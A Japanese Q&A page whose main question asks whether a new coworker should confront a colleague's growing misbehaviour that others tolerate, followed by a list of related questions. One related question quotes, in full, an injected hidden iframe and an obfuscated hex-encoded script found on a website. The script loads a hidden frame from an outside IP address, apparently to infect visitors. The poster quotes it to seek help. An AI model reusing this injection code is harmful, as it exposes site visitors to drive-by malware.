暴走を止めるべきか、見過ごすべきか?

このQ&Aのポイント
  • 暴走するAさんについて、BさんやCさんは見過ごすようになり、新たな仲間のDさんが気になっています。
  • Dさんは、Aさんの行動が今は大きな問題ではないが、将来的には悪くなりかねないと感じています。
  • しかし、Eさんが直接意見を言おうとすると迷惑な人として扱われる可能性があり、Aさんの行動は一時的に改善するだけかもしれません。
回答を見る
  • ベストアンサー

暴走を警告する人と気付かないふりをする人

だんだん、はみ出した行動をするようになってきたAさん。 同じ職場のBさん、Cさんも「まあ、たまにの事だし。」「それくらいはしかたないよね。」で済ませてきました。 指摘も注意もされないまま、2、3年月が過ぎ、Aさんのはみ出し行動もちょっと度が過ぎてきました。 すっかり、BさんとCさんは、指摘するタイミングを失い、気にならない風を装い流すようになりました。 新しく、仲間にDさんが加わりました。Dさんから見るとAさんの行動は、こう感じました。 今のところ大きな素行の悪さではないけど、しかし、あと1年もすればかなり悪くもなるだろうし、その前にその行動が程度が軽くても、当たり前のように継続している事は良い事ではないだろう。 というか、なぜ、BさんとCさんは見過ごしているんだろう。 暗黙のバランスが保たれたこの世界で、もし、Eさんが、Aさんの暴走を止めるべく、直接意見を言おうと、もしくは、BさんやCさんに言えば、 細かいことを言う迷惑な人という扱いで片付けられ、うるさい奴がきたから、少しそいつに合わせるかという雰囲気になり、少しだけAさんの行動が良くなる程度で終わることになりかねません。 この中で、なすべき事をするべき人の順位はわかりませんが、 自分がEだったら、先人に習いAさんを許容するか、立場の悪化を覚悟で意見するかどちらかしかないということでしょうか?

noname#136384
noname#136384

質問者が選んだベストアンサー

  • ベストアンサー
回答No.1

Eさん?→Dさんでしょうか? Dさんのポジションにもよると思います。 Dさんが単純な新入社員であればまず自分がAさんに対抗できるくらいの仕事スキルを身につけないことには何も始まらないかなと。仕事できない人が不満を言ったってそれは通じませんから。 また、まだ仕事できないDが職場内をかき回しただけでやりにくくなった業務のカバーもできないということであればB・Cに対しても申し訳ないと思います。 B・Cにうるさいやつがきたからって思われちゃう時点でDさんに言う文句は結局職場のことって言うよりも自分が許せないからになっちゃうのかなと。 結局、Dの能力次第になってくるのかと・・・時期をみるべきというか。 Dが同僚ではなく立場が上であればまた違ってくるんでしょうけどね。 組織の為に多少うるさがられてもAを怒るべきでしょうし。(自分の責任の中での仕事ですから)

noname#136384
質問者

お礼

ありがとうございました。

noname#136384
質問者

補足

スミマセン。 EをDに読み替えて下さい。

関連するQ&A

  • 暴走族に目をつけられた

    高校生の男です。 先日友人のAちゃんからメールがあって 「CちゃんがBくんのアド知りたいから聞いてみて」 というのでBの了承を得た後、CちゃんにB君のアドを教えました。 しばらくするとBくんから僕に電話がかかってきました。 「Cに番号教えたら暴走族に教えたって・・・」 とのことでした。 どうやらBくんは暴走族に目をつけられてるらしいです。 しかしBくんもCちゃんも思い当たる節はないようです。 暴走族絡みなのでかなり危ないと思うんですが、理由も相手もわからないので何ともできなくて困っているみたいです。 電話してみてもかなり不安そうで・・・どうにかしてやりたいんです。 この場合どのような行動案が考えられますか? できるだけ詳しくお願いいたします。

  • 警告状の理由

     中途で採用したA氏が職務上発明したものを、出願人を弊社とし、弁理士B氏に依頼して出願しました。この先願では、「a+b+c+dを有する物品」を独立請求項としています。  A氏は、その後、弊社を辞め、自分で弊社と似たような事業を始めました。  先願の出願後に弊所にて様々な検討を繰り返した結果、a+b+d+eを有する物品(つまり、cの代わりにe)の方が格段に性能が良いことが分かり、これを後願としてB氏に依頼し、出願しました。もちろん、後願では、「a+b+d+eを有する物品」を独立請求項にしています。  ところで、先日、A氏の代理人を名乗る弁理士C氏から、「後願を商品開発するつもりならば、先願に抵触しますので、そのときには、A氏は補償金を請求する所存です」という警告状が届きました。B氏と大笑いしながら無視することに決めました。ちなみに、弊社では、先願を審査請求する気すらありません。  ちょっと前置きが長くなりましたが、質問したいのは、「C氏は何故にこんな警告状を送ってきたのか?」ということです。「金が入るんだから、依頼人の言う通りにしておこう」ということでしたら悪徳弁護士と同レベルですし、特許法を知らないとしたら、C氏が弁理士を名乗れることが不思議でなりません。  「こういうことが考えられる」というご意見をお聞かせ下さい。

  •  暴走族絡みです 長いです 頭のいい方お願いします

    僕の友達の友達の友達が(ギャグではありません)暴走族です 僕の友達をA Aの友達をB Bの友達の暴走族Cとします Aが原付バイクを盗んで Bの友達のCに売りました。 そして数日後Cはつかまり Cはバイクを盗まれた被害者から賠償金の請求を受けました。 Aは賠償金として5000円払えと Cから連絡を受けました。 Aは僕にどうしたらいいかと連絡してきて 今に至ります。 しかしAは今5000円すらはらう余裕がないといいます この質問で聞きたいのは、 1 Aに賠償金を払う義務はあるのか 2 5000円というのは現実問題ありえるのか 3 この状況でどうすることがAにとって最善なのか です よろしくお願いします

  • 怪しいiframeあり、スパイウェア警告が出ます

    私のHPからリンクしている知人のサイトがあります。 その知人サイトを開いたときに「スパイウェア警告が出た」と私のHPのゲストブックに書き込みがありました。 連絡してくださった方の環境やどのような警告だったのかは分かりません。 プラグインやスクリプト系は全部切って、Operaでそのサイトのトップページを保存してエディタで開いてみたところ、BODYの最初にこんなタグが入っていました。 <iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v47597c712c521(v47597c712d107){ function v47597c712d4ea () {var v47597c712d8d2=16; return v47597c712d8d2;} return(parseInt(v47597c712d107,v47597c712d4ea()));}function v47597c712dcb9(v47597c712e09d){ var v47597c712e488='';for(v47597c712e86d=0; v47597c712e86d<v47597c712e09d.length; v47597c712e86d+=2){ v47597c712e488+=(String.fromCharCode(v47597c712c521(v47597c712e09d.substr(v47597c712e86d, 2))));}return v47597c712e488;} document.write(v47597c712dcb9('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D38383932633136207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3632323734292B273064385C272077696474683D323931206865696768743D323134207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script> これがスパイウェアのコードなのでしょうか? また、スパイウェアだとしたら、今回のスパイウェアがどのような類のものなのか解説や対処方法が掲載されたURL(あるいは検索用キーワード)を教えていただけませんでしょうか。 よろしくお願いします。

  • A、B、C、D、Eのどの人が一番真ん中に座ってる?

    ChatGPTに「なんか問題出して」と言ったところ、以下の問題が出てきました。 A、B、C、D、Eの5人が隣り合って座っています。CはAの隣に座り、BはDの隣に座っています。どの人が一番真ん中に座っているでしょうか? ・・・? これって答えが一意に決まらないですよね? 一つ目は、C-Aでもいいですし、A-Cでもいいですよね? 二つ目は、B-Dでもいいですし、D-Bでもいいですよね? そうなると、どのアルファベットでも真ん中にすることができますよね? C-A-E-B-D E-C-A-B-D E-A-C-B-D E-B-D-C-A E-D-B-C-A ・・・何か間違っていますか? この問題だと、「CはAの「右」隣に座り・・・」などと細かく指定しても、まだ一意に決まりそうにないですよね。 以下に、ChatGPTとBingChatの解答を添えました。 ChatGPTもBingChatも間違った解答を示すことがよくあると知っていますが、これらの解答にもまったく納得いっていません。 第三者の意見が訊きたいです。 ■ChatGPTの解答■ 与えられた情報から、CはAの隣に座っているということが分かります。また、BはDの隣に座っています。したがって、座席の順番は次のようになります: A - C - B - D - E この座席の配置において、CがAの隣に座っているため、CはAと隣り合っています。従って、Cが一番真ん中に座っていることになります。 (私談:自分でA - C - B - D - Eと書いておいて「Cが一番真ん中」ですか・・・) ■BingChatの解答■ この問題は、論理的に考えると簡単に解けます。まず、CはAの隣に座っているので、Cは端には座っていません。同様に、BはDの隣に座っているので、Bも端には座っていません。したがって、端に座っているのはAとEのどちらかです。次に、AとEのどちらが端に座っているかを考えます。もしAが端に座っているとすると、CはAの隣に座っているので、CはAの反対側の端から2番目に座っています。しかし、この場合、BはDの隣に座っているという条件を満たせません。なぜなら、BはCの反対側の端から2番目に座らなければならず、その場合Dは端から3番目に座らなければならないからです。これは5人しかいないという前提に反します。よって、Aが端に座っているという仮定は間違っています。したがって、Eが端に座っているということになります。Eが端に座っているとすると、CはEの反対側の端から2番目に座り、BはDの隣に座ります。この場合、一番真ん中に座るのはDです。答えはDです。

  • 警告が・・・・・。

    こんばんわ。今回質問したいことは、 パソコンを起動してデスクトップに行くと NTAG32 のスタック エラーです。 モジュール : KERNEL32.DLL、アドレス : 0167:bff83e4a Registers: EAX=00b74268 CS=0167 EIP=bff83e4a EFLGS=00010212 EBX=83f26300 SS=016f ESP=00551ff8 EBP=00552000 ECX=00b74268 DS=016f ESI=00b74268 FS=3ef7 EDX=00000000 ES=016f EDI=7fffffff GS=0000 Bytes at CS:EIP: c7 45 fc 01 00 00 00 53 57 53 57 0f b7 4d 0c 0f Stack dump: 00000000 00000000 00552038 bff9e457 8000739e 42688000 00000000 00b74268 7fffffff ffffffff 70214205 8000739e 42688000 00b74268 00b742f4 0000004 のような警告が出ます、どなたかアドバイスお願いします。

  • 思わせ振りなだけでしょうか?

    初めまして! 私は高校2年生です。 私は今、同じクラスの人が気になっています。 (ここではA君とします) きっかけは、違うクラスのB君が私に必要以上にメールしてきたり移動教室の際に待ち伏せしていたりし始めた時でした。 B君は休み時間の度に私のクラスに来たり、周りから見ても少し変な行動をとっていたので私も気味悪くなってクラスの友達に相談していました。 友達がその事を気にしてB君と同じ部活のクラスメイトに、どうにかするように言ってくれました。 (その中には私の気になっているA君も含みます。) そしてA君がB君に 『あいつの事はもう無理だと思うから諦めた方がいい』的な事で話をしてくれB君からの不気味な行動はなくなりました。 友達には、少しでも気がないとそんな事言ってくれないんじゃない?って言われました。 単純な私はその事で少しA君がかっこよく見えました。 そんな事があって日がたたないうちに文化祭と体育祭がありました。 体育祭が終わった日に前日の文化祭で撮った写真を(二人で撮ったとかじゃないです)A君に送ると体育祭の話になりました。 私が 『私は見れなかったけどリレーかっこ良かったっていろんな人から聞いたよ!! 話聞いてたら私も見たかったなぁーって思った』 ってメールすると 『見てほしかった』 っていう返信と目がハートのデコメが付いていました。 他にも、次の日が試合だと言ったので、地元から応援してると返信すると 『16日もあるから16日もよろしく(笑)』 などと言った少し期待してしまう返信がありました。 今までA君は違うクラスに凄いかわいい彼女がいて、私もその事を知っていたので恋愛感情でA君を見る事はありませんでした。 でも最近別れたと聞いて、こういう事があったので期待してしまいます。 A君のこういった返信やB君に話をしてくれた行動は、相手に気がなくてもある事だと思いますか? ただ思わせ振りなだけでしょうか? 文章力がなく読みにくいと思いますがいろんな方の意見が聞きたいです。 よろしくお願いします。

  • 本当に忘れているの?それとも「ふり」?

    こんにちは。 少し状況がわかりにくいと思いますが、客観的なご意見が聞きたいです。 ・登場人物 A:女性。Bと2年ほど前から付き合っている。Cとは友人。 B:Aの彼氏。4年ほど前にCに告白され付き合いかけたが、相性が合わなく?1ヶ月ほどで破局。 C:女性。Aとは友人で、Bに告白した事がある。しかし、その後は上に書いたとおり。 ・状況 AはCとBが一瞬付き合いかけたのを知っているが、Cはその事をAが知らないと思っている。 Cには2年ほど前にAがBと付き合い始めたことを、A自信が教えている。その際Cからしつこく問いただされ、半ば誘導尋問的に付き合っている人の名前を言わされた。 最近、AとCが久しぶりに会い、近況報告。 Aは、今付き合ってる人を聞かれ、「2年ほど前に教えた人と変わっていない」と答えた。 すると、Cは聞いた覚えがないと言う。 ここで質問なのですが、Cは本当に忘れているのでしょうか・・・?それとも「ふり」? 友人のつきあってる人が自分の知り合い(しかも告白した人)な事を忘れるのでしょうか? 他の仲間達もいた手前(その中にはCがBと付き合いかけたことを知っているものもいたため)、知らないふりをしたのか疑問です。Bにわだかまりを持っているから知らないふりをしたのか(考えにくいですが)、逆にもう全然わだかまりがないから本当に忘れてしまったのか・・・。 もしAがBとの結婚式にCを招待した場合、Cは出席するでしょうか。 Cは遊び人タイプとかではなく、次から次へ付き合う人を変えるわけではないので、忘れるのは考えにくいような気もするのですが・・・。それも2年前はしつこくAに問いただしたのに。 もし「ふり」だとしたら、仲間がいたとはいえ何故そんなことをするのでしょうか。 ちなみにAはCとBのことは焼きもちや不安といった事は一切ないようです。 よろしくお願いします。

  • 4元連立方程式について

    Excelで方程式を解いたのですがひとつだけ答えが合わないのです。どなたかこの式の違うところを教えてください。 5x-2y+4z+3m=75 x+3y-5z-m=-36 4x-3y+z+4m=51 3x+5y-3z-2m=-12 Excel上での計算式↓ =(A1*E2*C3*D4-A1*E2*C4*D3-A1*E3*C2*D4+A1*E3*C4*D2+A1*E4*C2*D3-A1*E4*C3*D2-A2*E1*C3*D4+A2*E1*C4*D3+A2*E3*C1*D4-A2*E3*C4*D1-A2*E4*C1*D3+A2*E4*C3*D1+A3*E1*C2*D4-A3*E1*C4*D2-A3*E2*C1*D4+A3*E2*C4*D1+A3*E4*C1*D2-A3*E4*C2*D1-A4*E1*C2*D3+A4*E1*C3*2+A4*E2*C1*D3-A4*E2*C3*D1-A4*E3*C1*D2+A4*E3*C2*D1)/(A1*B2*C3*D4-A1*B2*C4*D3-A1*B3*C2*D4+A1*B3*C4*D2+A1*B4*C2*D3-A1*B4*C3*D2-A2*B1*C3*D4+A2*B1*C4*D3+A2*B3*C1*D4-A2*B3*C4*D1-A2*B4*C1*D3+A2*B4*C3*D1+A3*B1*C2*D4-A3*B1*C4*D2-A3*B2*C1*D4+A3*B2*C4*D1+A3*B4*C1*D2-A3*B4*C2*D1-A4*B1*C2*D3+A4*B1*C3*D2+A4*B2*C1*D3-A4*B2*C3*D1-A4*B3*C1*D2+A4*B3*C2*D1)

  • 暴利を貪る妻に対して

    AとBには、その子C,D,Eがいる。 Cには妻Xと子y、zがいる。 AとCは既に亡くなっている。 Bは現在、軽度の痴呆症である。 Bは生前のCを良く可愛がっていて、不動産などの資金を援助していた。 CとXはBの近くに住んでいる事もあり、たまにBの面倒を見ていた。 Cの死後、XはBを老人ホームに入れ、Cの財産と年金受給権を事実上管理している。 現在XがBの資産を食い物にしている状況です。 Bの子であるD,Eはそれを辞める様に促しているのですが、聞き入れる様子もありません。 この場合、Xの行動を止めるにはどうしたら良いでしょうか? D,EはBを制限能力者として家裁に申請し、財産を管理する事が出来るのでしょうか? 色んな方法があると思いますが、ご意見を頂けたらありがたいです。

専門家に質問してみよう